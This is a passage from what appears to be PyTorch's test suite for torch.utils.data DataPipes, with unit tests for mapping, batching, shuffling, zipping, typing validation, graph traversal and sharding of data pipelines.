self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
input_dp_nl = IDP_NoLen(range(10))
map_dp_nl = input_dp_nl.map(lambda x: x)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(map_dp_nl)
for x, y in zip(map_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
@suppress_warnings # Suppress warning for lambda fn
def test_map_tuple_list_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
def _helper(ref_fn, fn, input_col=None, output_col=None):
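# res_dp applies fn only to the requested input/output columns, while ref_dp
# applies the hand-written reference function to the whole row, so the two
# pipes must yield identical rows (also after a reset).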
for constr in (list, tuple):
datapipe = dp.iter.IterableWrapper([constr((0, 1, 2)), constr((3, 4, 5)), constr((6, 7, 8))])
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: (data[0], -data[1], data[2]), fn_11, 1)
_helper(lambda data: (data[0], (-data[1], data[1]), data[2]), fn_1n, 1)
# The index of input column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 3)
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, 1)
# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: (data[1], data[2] + data[0]), fn_n1, [2, 0])
_helper(lambda data: (data[0], (-data[2], -data[1], data[2] + data[1])), fn_nn, [2, 1])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, 1)
# output_col can only be a single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, [0, 1])
# Single-element list as output_col
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, [0])
# Replacing with one input column and single specified output column
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, 0)
_helper(lambda data: (data[0], data[1], (-data[1], data[1])), fn_1n, 1, 2)
# The index of output column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 1, 3)
_helper(lambda data: (data[0], data[0] + data[2], data[2]), fn_n1, [0, 2], 1)
_helper(lambda data: ((-data[1], -data[2], data[1] + data[2]), data[1], data[2]), fn_nn, [1, 2], 0)
# Appending the output at the end
_helper(lambda data: (*data, -data[1]), fn_11, 1, -1)
_helper(lambda data: (*data, (-data[1], data[1])), fn_1n, 1, -1)
_helper(lambda data: (*data, data[0] + data[2]), fn_n1, [0, 2], -1)
_helper(lambda data: (*data, (-data[1], -data[2], data[1] + data[2])), fn_nn, [1, 2], -1)
@suppress_warnings # Suppress warning for lambda fn
def test_map_dict_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
# Prevent modification in-place to support resetting
def _dict_update(data, newdata, remove_idx=None):
_data = dict(data)
_data.update(newdata)
if remove_idx:
for idx in remove_idx:
del _data[idx]
return _data
def _helper(ref_fn, fn, input_col=None, output_col=None):
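# Same pattern as the tuple/list helper above: fn operates on the selected dict
# keys via input_col/output_col, while ref_fn builds the expected dict directly.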
datapipe = dp.iter.IterableWrapper(
[{"x": 0, "y": 1, "z": 2},
{"x": 3, "y": 4, "z": 5},
{"x": 6, "y": 7, "z": 8}]
)
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: _dict_update(data, {"y": -data["y"]}), fn_11, "y")
_helper(lambda data: _dict_update(data, {"y": (-data["y"], data["y"])}), fn_1n, "y")
# The key of input column is not in dict
with self.assertRaises(KeyError):
_helper(None, fn_1n, "a")
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, "y")
# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: _dict_update(data, {"z": data["x"] + data["z"]}, ["x"]), fn_n1, ["z", "x"])
_helper(lambda data: _dict_update(data, {"z": (-data["z"], -data["y"], data["y"] + data["z"])}, ["y"]), fn_nn, ["z", "y"])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, "x")
# output_col can only be a single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, ["x", "y"])
# Single-element list as output_col
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", ["x"])
# Replacing with one input column and single specified output column
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", "x")
_helper(lambda data: _dict_update(data, {"z": (-data["y"], data["y"])}), fn_1n, "y", "z")
_helper(lambda data: _dict_update(data, {"y": data["x"] + data["z"]}), fn_n1, ["x", "z"], "y")
_helper(lambda data: _dict_update(data, {"x": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "x")
# Adding new key to dict for the output
_helper(lambda data: _dict_update(data, {"a": -data["y"]}), fn_11, "y", "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], data["y"])}), fn_1n, "y", "a")
_helper(lambda data: _dict_update(data, {"a": data["x"] + data["z"]}), fn_n1, ["x", "z"], "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "a")
def test_collate_datapipe(self):
arrs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
input_dp = dp.iter.IterableWrapper(arrs)
def _collate_fn(batch):
return torch.tensor(sum(batch), dtype=torch.float)
collate_dp = input_dp.collate(collate_fn=_collate_fn)
self.assertEqual(len(input_dp), len(collate_dp))
for x, y in zip(collate_dp, input_dp):
self.assertEqual(x, torch.tensor(sum(y), dtype=torch.float))
input_dp_nl = IDP_NoLen(arrs)
collate_dp_nl = input_dp_nl.collate()
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(collate_dp_nl)
for x, y in zip(collate_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y))
def test_batch_datapipe(self):
arrs = list(range(10))
input_dp = dp.iter.IterableWrapper(arrs)
with self.assertRaises(AssertionError):
input_dp.batch(batch_size=0)
# By default, do not drop the last batch
bs = 3
batch_dp = input_dp.batch(batch_size=bs)
self.assertEqual(len(batch_dp), 4)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), 1 if i == 3 else bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
# Drop the last batch
bs = 4
batch_dp = input_dp.batch(batch_size=bs, drop_last=True)
self.assertEqual(len(batch_dp), 2)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
input_dp_nl = IDP_NoLen(range(10))
batch_dp_nl = input_dp_nl.batch(batch_size=2)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(batch_dp_nl)
def test_unbatch_datapipe(self):
target_length = 6
prebatch_dp = dp.iter.IterableWrapper(range(target_length))
input_dp = prebatch_dp.batch(3)
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = dp.iter.IterableWrapper([[0, 1, 2], [3, 4, 5]])
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = dp.iter.IterableWrapper([[[0, 1], [2, 3]], [[4, 5], [6, 7]]])
unbatch_dp = input_dp.unbatch()
expected_dp = [[0, 1], [2, 3], [4, 5], [6, 7]]
self.assertEqual(len(list(unbatch_dp)), 4)
for i, res in zip(expected_dp, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=2)
expected_dp2 = [0, 1, 2, 3, 4, 5, 6, 7]
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=-1)
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
input_dp = dp.iter.IterableWrapper([[0, 1, 2], [3, 4, 5]])
with self.assertRaises(ValueError):
unbatch_dp = input_dp.unbatch(unbatch_level=-2)
for i in unbatch_dp:
print(i)
with self.assertRaises(IndexError):
unbatch_dp = input_dp.unbatch(unbatch_level=5)
for i in unbatch_dp:
print(i)
def test_bucket_batch_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(20))
with self.assertRaises(AssertionError):
dp.iter.BucketBatcher(input_dp, batch_size=0)
input_dp_nl = IDP_NoLen(range(20))
bucket_dp_nl = dp.iter.BucketBatcher(input_dp_nl, batch_size=7)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(bucket_dp_nl)
def _helper(**kwargs):
data_len = 100
arrs = list(range(data_len))
random.shuffle(arrs)
input_dp = dp.iter.IterableWrapper(arrs)
bucket_dp = dp.iter.BucketBatcher(input_dp, **kwargs)
self.assertEqual(len(bucket_dp), data_len // 3 if kwargs['drop_last'] else data_len // 3 + 1)
def _verify_bucket_sorted(bucket):
# Sort the batches within a bucket
bucket = sorted(bucket, key=lambda x: x[0])
flat = [item for batch in bucket for item in batch]
# Elements in the bucket should be sorted
self.assertEqual(flat, sorted(flat))
batch_num = kwargs['batch_num'] if 'batch_num' in kwargs else 100
bucket = []
for idx, d in enumerate(bucket_dp):
self.assertEqual(d, sorted(d))
bucket.append(d)
if idx % batch_num == batch_num - 1:
_verify_bucket_sorted(bucket)
bucket = []
_verify_bucket_sorted(bucket)
def _sort_fn(data):
return sorted(data)
# In-batch shuffle
_helper(batch_size=3, drop_last=False, batch_num=5, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=False, batch_num=2, bucket_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, bucket_num=2, sort_key=_sort_fn)
def test_filter_datapipe(self):
input_ds = dp.iter.IterableWrapper(range(10))
def _filter_fn(data, val, clip=False):
if clip:
return data >= val
return True
filter_dp = input_ds.filter(partial(_filter_fn, val=5))
for data, exp in zip(filter_dp, range(10)):
self.assertEqual(data, exp)
filter_dp = input_ds.filter(partial(_filter_fn, val=5, clip=True))
for data, exp in zip(filter_dp, range(5, 10)):
self.assertEqual(data, exp)
with self.assertRaisesRegex(TypeError, r"has no len"):
len(filter_dp)
def _non_bool_fn(data):
return 1
filter_dp = input_ds.filter(filter_fn=_non_bool_fn)
with self.assertRaises(ValueError):
temp = list(filter_dp)
def test_sampler_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
# Default SequentialSampler
sampled_dp = dp.iter.Sampler(input_dp) # type: ignore[var-annotated]
self.assertEqual(len(sampled_dp), 10)
for i, x in enumerate(sampled_dp):
self.assertEqual(x, i)
# RandomSampler
random_sampled_dp = dp.iter.Sampler(input_dp, sampler=RandomSampler, sampler_kwargs={'replacement': True}) # type: ignore[var-annotated] # noqa: B950
# Requires `__len__` to build SamplerDataPipe
input_dp_nolen = IDP_NoLen(range(10))
with self.assertRaises(AssertionError):
sampled_dp = dp.iter.Sampler(input_dp_nolen)
def test_shuffle_datapipe(self):
exp = list(range(20))
input_ds = dp.iter.IterableWrapper(exp)
with self.assertRaises(AssertionError):
shuffle_dp = input_ds.shuffle(buffer_size=0)
for bs in (5, 20, 25):
shuffle_dp = input_ds.shuffle(buffer_size=bs)
self.assertEqual(len(shuffle_dp), len(input_ds))
random.seed(123)
res = list(shuffle_dp)
self.assertEqual(sorted(res), exp)
# Test Deterministic
for num_workers in (0, 1):
random.seed(123)
dl = DataLoader(shuffle_dp, num_workers=num_workers, worker_init_fn=_worker_init_fn, shuffle=True)
dl_res = list(dl)
self.assertEqual(res, dl_res)
shuffle_dp_nl = IDP_NoLen(range(20)).shuffle(buffer_size=5)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(shuffle_dp_nl)
def test_zip_datapipe(self):
with self.assertRaises(TypeError):
dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), list(range(10))) # type: ignore[arg-type]
zipped_dp = dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), IDP_NoLen(range(5))) # type: ignore[var-annotated]
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(zipped_dp)
exp = list((i, i) for i in range(5))
self.assertEqual(list(zipped_dp), exp)
zipped_dp = dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), dp.iter.IterableWrapper(range(5)))
self.assertEqual(len(zipped_dp), 5)
self.assertEqual(list(zipped_dp), exp)
# Reset
self.assertEqual(list(zipped_dp), exp)
class TestFunctionalMapDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill is installed, this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (), {}),
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (_fake_fn, (0,)), {}),
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (partial(_fake_add, 1), (0,)), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (lambda x: x,), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(
str(wa[0].message), r"^Lambda function is not supported for pickle"
)
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_sequence_wrapper_datapipe(self):
seq = list(range(10))
input_dp = dp.map.SequenceWrapper(seq)
# Functional Test: all elements are equal in the same order
self.assertEqual(seq, list(input_dp))
# Functional Test: confirm deepcopy works by default
seq.append(11)
self.assertEqual(list(range(10)), list(input_dp)) # input_dp shouldn't have 11
# Functional Test: non-deepcopy version is working
seq2 = [1, 2, 3]
input_dp_non_deep = dp.map.SequenceWrapper(seq2, deepcopy=False)
seq2.append(4)
self.assertEqual(list(seq2), list(input_dp_non_deep)) # should have 4
# Reset Test: reset the DataPipe
seq = list(range(10))
n_elements_before_reset = 5
res_before_reset, res_after_reset = reset_after_n_next_calls(input_dp, n_elements_before_reset)
self.assertEqual(list(range(5)), res_before_reset)
self.assertEqual(seq, res_after_reset)
# __len__ Test: inherits length from sequence
self.assertEqual(len(seq), len(input_dp))
def test_concat_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
for index in range(15):
self.assertEqual(concat_dp[index], (list(range(10)) + list(range(5)))[index])
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_zip_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper(range(5))
input_dp3 = dp.map.SequenceWrapper(range(15))
# Functional Test: requires at least one input DataPipe
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Zipper()
# Functional Test: all inputs must be MapDataPipes
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Zipper(input_dp1, ()) # type: ignore[arg-type]
# Functional Test: Zip the elements up as tuples
zip_dp = input_dp1.zip(input_dp2, input_dp3)
self.assertEqual([(i, i, i) for i in range(5)], [zip_dp[i] for i in range(5)])
# Functional Test: Raise IndexError when the index equals or exceeds the length of the shortest DataPipe
with self.assertRaisesRegex(IndexError, r"out of range"):
input_dp1.zip(input_dp2, input_dp3)[5]
# __len__ Test: returns the length of the shortest DataPipe
zip_dp = input_dp1.zip(input_dp2, input_dp3)
self.assertEqual(5, len(zip_dp))
def test_shuffler_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper({'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5})
# Functional Test: Assumes 0-based indices when indices is not given
shuffler_dp = input_dp1.shuffle()
self.assertEqual(set(range(10)), set(shuffler_dp))
# Functional Test: Custom indices are working
shuffler_dp = dp.map.Shuffler(input_dp2, indices=['a', 'b', 'c', 'd', 'e'])
self.assertEqual(set(range(1, 6)), set(shuffler_dp))
# Reset Test:
shuffler_dp = input_dp1.shuffle()
n_elements_before_reset = 5
res_before_reset, res_after_reset = reset_after_n_next_calls(shuffler_dp, n_elements_before_reset)
self.assertEqual(5, len(res_before_reset))
for x in res_before_reset:
self.assertTrue(x in set(range(10)))
self.assertEqual(set(range(10)), set(res_after_reset))
# __len__ Test: returns the length of the input DataPipe
shuffler_dp = input_dp1.shuffle()
self.assertEqual(10, len(shuffler_dp))
def test_map_datapipe(self):
arr = range(10)
input_dp = dp.map.SequenceWrapper(arr)
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.float)
)
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
)
def test_batch_datapipe(self):
arr = list(range(13))
input_dp = dp.map.SequenceWrapper(arr)
# Functional Test: batches top level by default
batch_dp = dp.map.Batcher(input_dp, batch_size=2)
self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11], [12]], list(batch_dp))
# Functional Test: drop_last on command
batch_dp = dp.map.Batcher(input_dp, batch_size=2, drop_last=True)
self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]], list(batch_dp))
# Functional Test: nested batching
batch_dp_2 = batch_dp.batch(batch_size=3)
self.assertEqual([[[0, 1], [2, 3], [4, 5]], [[6, 7], [8, 9], [10, 11]]], list(batch_dp_2))
# Reset Test:
n_elements_before_reset = 3
res_before_reset, res_after_reset = reset_after_n_next_calls(batch_dp, n_elements_before_reset)
self.assertEqual([[0, 1], [2, 3], [4, 5]], res_before_reset)
self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]], res_after_reset)
# __len__ Test:
self.assertEqual(6, len(batch_dp))
self.assertEqual(2, len(batch_dp_2))
# Metaclass conflict for Python 3.6
# Multiple inheritance with NamedTuple is not supported for Python 3.9
_generic_namedtuple_allowed = sys.version_info >= (3, 7) and sys.version_info < (3, 9)
if _generic_namedtuple_allowed:
class InvalidData(Generic[T_co], NamedTuple):
name: str
data: T_co
class TestTyping(TestCase):
def test_subtype(self):
from torch.utils.data._typing import issubtype
basic_type = (int, str, bool, float, complex,
list, tuple, dict, set, T_co)
for t in basic_type:
self.assertTrue(issubtype(t, t))
self.assertTrue(issubtype(t, Any))
if t == T_co:
self.assertTrue(issubtype(Any, t))
else:
self.assertFalse(issubtype(Any, t))
for t1, t2 in itertools.product(basic_type, basic_type):
if t1 == t2 or t2 == T_co:
self.assertTrue(issubtype(t1, t2))
else:
self.assertFalse(issubtype(t1, t2))
T = TypeVar('T', int, str)
S = TypeVar('S', bool, Union[str, int], Tuple[int, T]) # type: ignore[valid-type]
types = ((int, Optional[int]),
(List, Union[int, list]),
(Tuple[int, str], S),
(Tuple[int, str], tuple),
(T, S),
(S, T_co),
(T, Union[S, Set]))
for sub, par in types:
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
subscriptable_types = {
List: 1,
Tuple: 2, # use 2 parameters
Set: 1,
Dict: 2,
}
for subscript_type, n in subscriptable_types.items():
for ts in itertools.combinations(types, n):
subs, pars = zip(*ts)
sub = subscript_type[subs] # type: ignore[index]
par = subscript_type[pars] # type: ignore[index]
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
# Non-recursive check
self.assertTrue(issubtype(par, sub, recursive=False))
def test_issubinstance(self):
from torch.utils.data._typing import issubinstance
basic_data = (1, '1', True, 1., complex(1., 0.))
basic_type = (int, str, bool, float, complex)
S = TypeVar('S', bool, Union[str, int])
for d in basic_data:
self.assertTrue(issubinstance(d, Any))
self.assertTrue(issubinstance(d, T_co))
if type(d) in (bool, int, str):
self.assertTrue(issubinstance(d, S))
else:
self.assertFalse(issubinstance(d, S))
for t in basic_type:
if type(d) == t:
self.assertTrue(issubinstance(d, t))
else:
self.assertFalse(issubinstance(d, t))
# list/set
dt = (([1, '1', 2], List), (set({1, '1', 2}), Set))
for d, t in dt:
self.assertTrue(issubinstance(d, t))
self.assertTrue(issubinstance(d, t[T_co])) # type: ignore[index]
self.assertFalse(issubinstance(d, t[int])) # type: ignore[index]
# dict
d = dict({'1': 1, '2': 2.})
self.assertTrue(issubinstance(d, Dict))
self.assertTrue(issubinstance(d, Dict[str, T_co]))
self.assertFalse(issubinstance(d, Dict[str, int]))
# tuple
d = (1, '1', 2)
self.assertTrue(issubinstance(d, Tuple))
self.assertTrue(issubinstance(d, Tuple[int, str, T_co]))
self.assertFalse(issubinstance(d, Tuple[int, Any]))
self.assertFalse(issubinstance(d, Tuple[int, int, int]))
# Static checking annotation
def test_compile_time(self):
with self.assertRaisesRegex(TypeError, r"Expected 'Iterator' as the return"):
class InvalidDP1(IterDataPipe[int]):
def __iter__(self) -> str: # type: ignore[misc, override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP2(IterDataPipe[Tuple]):
def __iter__(self) -> Iterator[int]: # type: ignore[override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP3(IterDataPipe[Tuple[int, str]]):
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
if _generic_namedtuple_allowed:
with self.assertRaisesRegex(TypeError, r"is not supported by Python typing"):
class InvalidDP4(IterDataPipe["InvalidData[int]"]): # type: ignore[type-arg, misc]
pass
class DP1(IterDataPipe[Tuple[int, str]]):
def __init__(self, length):
self.length = length
def __iter__(self) -> Iterator[Tuple[int, str]]:
for d in range(self.length):
yield d, str(d)
self.assertTrue(issubclass(DP1, IterDataPipe))
dp1 = DP1(10)
self.assertTrue(DP1.type.issubtype(dp1.type) and dp1.type.issubtype(DP1.type))
dp1_ = DP1(5)
self.assertEqual(dp1.type, dp1_.type)
with self.assertRaisesRegex(TypeError, r"is not a generic class"):
class InvalidDP5(DP1[tuple]): # type: ignore[type-arg]
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
class DP2(IterDataPipe[T_co]):
def __iter__(self) -> Iterator[T_co]:
for d in range(10):
yield d # type: ignore[misc]
self.assertTrue(issubclass(DP2, IterDataPipe))
dp2 = DP2() # type: ignore[var-annotated]
self.assertTrue(DP2.type.issubtype(dp2.type) and dp2.type.issubtype(DP2.type))
dp2_ = DP2() # type: ignore[var-annotated]
self.assertEqual(dp2.type, dp2_.type)
class DP3(IterDataPipe[Tuple[T_co, str]]):
r""" DataPipe without fixed type with __init__ function"""
def __init__(self, datasource):
self.datasource = datasource
def __iter__(self) -> Iterator[Tuple[T_co, str]]:
for d in self.datasource:
yield d, str(d)
self.assertTrue(issubclass(DP3, IterDataPipe))
dp3 = DP3(range(10)) # type: ignore[var-annotated]
self.assertTrue(DP3.type.issubtype(dp3.type) and dp3.type.issubtype(DP3.type))
dp3_ = DP3(5) # type: ignore[var-annotated]
self.assertEqual(dp3.type, dp3_.type)
class DP4(IterDataPipe[tuple]):
r""" DataPipe without __iter__ annotation"""
def __iter__(self):
raise NotImplementedError
self.assertTrue(issubclass(DP4, IterDataPipe))
dp4 = DP4()
self.assertTrue(dp4.type.param == tuple)
class DP5(IterDataPipe):
r""" DataPipe without type annotation"""
def __iter__(self) -> Iterator[str]:
raise NotImplementedError
self.assertTrue(issubclass(DP5, IterDataPipe))
dp5 = DP5()
from torch.utils.data._typing import issubtype
self.assertTrue(issubtype(dp5.type.param, Any) and issubtype(Any, dp5.type.param))
class DP6(IterDataPipe[int]):
r""" DataPipe with plain Iterator"""
def __iter__(self) -> Iterator:
raise NotImplementedError
self.assertTrue(issubclass(DP6, IterDataPipe))
dp6 = DP6()
self.assertTrue(dp6.type.param == int)
class DP7(IterDataPipe[Awaitable[T_co]]):
r""" DataPipe with abstract base class"""
self.assertTrue(issubclass(DP7, IterDataPipe))
self.assertTrue(DP7.type.param == Awaitable[T_co])
class DP8(DP7[str]):
r""" DataPipe subclass from a DataPipe with abc type"""
self.assertTrue(issubclass(DP8, IterDataPipe))
self.assertTrue(DP8.type.param == Awaitable[str])
def test_construct_time(self):
class DP0(IterDataPipe[Tuple]):
@argument_validation
def __init__(self, dp: IterDataPipe):
self.dp = dp
def __iter__(self) -> Iterator[Tuple]:
for d in self.dp:
yield d, str(d)
class DP1(IterDataPipe[int]):
@argument_validation
def __init__(self, dp: IterDataPipe[Tuple[int, str]]):
self.dp = dp
def __iter__(self) -> Iterator[int]:
for a, b in self.dp:
yield a
# Non-DataPipe input with DataPipe hint
datasource = [(1, '1'), (2, '2'), (3, '3')]
with self.assertRaisesRegex(TypeError, r"Expected argument 'dp' as a IterDataPipe"):
dp0 = DP0(datasource)
dp0 = DP0(dp.iter.IterableWrapper(range(10)))
with self.assertRaisesRegex(TypeError, r"Expected type of argument 'dp' as a subtype"):
dp1 = DP1(dp0)
def test_runtime(self):
class DP(IterDataPipe[Tuple[int, T_co]]):
def __init__(self, datasource):
self.ds = datasource
@runtime_validation
def __iter__(self) -> Iterator[Tuple[int, T_co]]:
for d in self.ds:
yield d
dss = ([(1, '1'), (2, '2')],
[(1, 1), (2, '2')])
for ds in dss:
dp0 = DP(ds) # type: ignore[var-annotated]
self.assertEqual(list(dp0), ds)
# Reset __iter__
self.assertEqual(list(dp0), ds)
dss = ([(1, 1), ('2', 2)], # type: ignore[assignment, list-item]
[[1, '1'], [2, '2']], # type: ignore[list-item]
[1, '1', 2, '2'])
for ds in dss:
dp0 = DP(ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp0)
with runtime_validation_disabled():
self.assertEqual(list(dp0), ds)
with runtime_validation_disabled():
self.assertEqual(list(dp0), ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp0)
def test_reinforce(self):
T = TypeVar('T', int, str)
class DP(IterDataPipe[T]):
def __init__(self, ds):
self.ds = ds
@runtime_validation
def __iter__(self) -> Iterator[T]:
for d in self.ds:
yield d
ds = list(range(10))
# Valid type reinforcement
dp0 = DP(ds).reinforce_type(int)
self.assertTrue(dp0.type, int)
self.assertEqual(list(dp0), ds)
# Invalid type
with self.assertRaisesRegex(TypeError, r"'expected_type' must be a type"):
dp1 = DP(ds).reinforce_type(1)
# Type is not subtype
with self.assertRaisesRegex(TypeError, r"Expected 'expected_type' as subtype of"):
dp2 = DP(ds).reinforce_type(float)
# Invalid data at runtime
dp3 = DP(ds).reinforce_type(str)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp3)
# Context Manager to disable the runtime validation
with runtime_validation_disabled():
self.assertEqual(list(d for d in dp3), ds)
class NumbersDataset(IterDataPipe):
def __init__(self, size=10):
self.size = size
def __iter__(self):
for i in range(self.size):
yield i
class TestGraph(TestCase):
@skipIfNoDill
def test_simple_traverse(self):
numbers_dp = NumbersDataset(size=50)
mapped_dp = numbers_dp.map(lambda x: x * 10)
graph = torch.utils.data.graph.traverse(mapped_dp)
expected: Dict[Any, Any] = {mapped_dp: {numbers_dp: {}}}
self.assertEqual(expected, graph)
@skipIfNoDill
def test_traverse_forked(self):
numbers_dp = NumbersDataset(size=50)
dp0, dp1, dp2 = numbers_dp.fork(num_instances=3)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd, dp2)
graph = torch.utils.data.graph.traverse(combined_dp)
expected = {combined_dp: {dp0_upd: {dp0: {dp0.main_datapipe: {dp0.main_datapipe.main_datapipe: {}}}},
dp1_upd: {dp1: {dp1.main_datapipe: {dp1.main_datapipe.main_datapipe: {}}}},
dp2: {dp2.main_datapipe: {dp2.main_datapipe.main_datapipe: {}}}}}
self.assertEqual(expected, graph)
class TestSharding(TestCase):
def _get_pipeline(self):
numbers_dp = NumbersDataset(size=10)
dp0, dp1 = numbers_dp.fork(num_instances=2)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd)
return combined_dp
@skipIfNoDill
def test_simple_sharding(self):
sharded_dp = self._get_pipeline().sharding_filter()
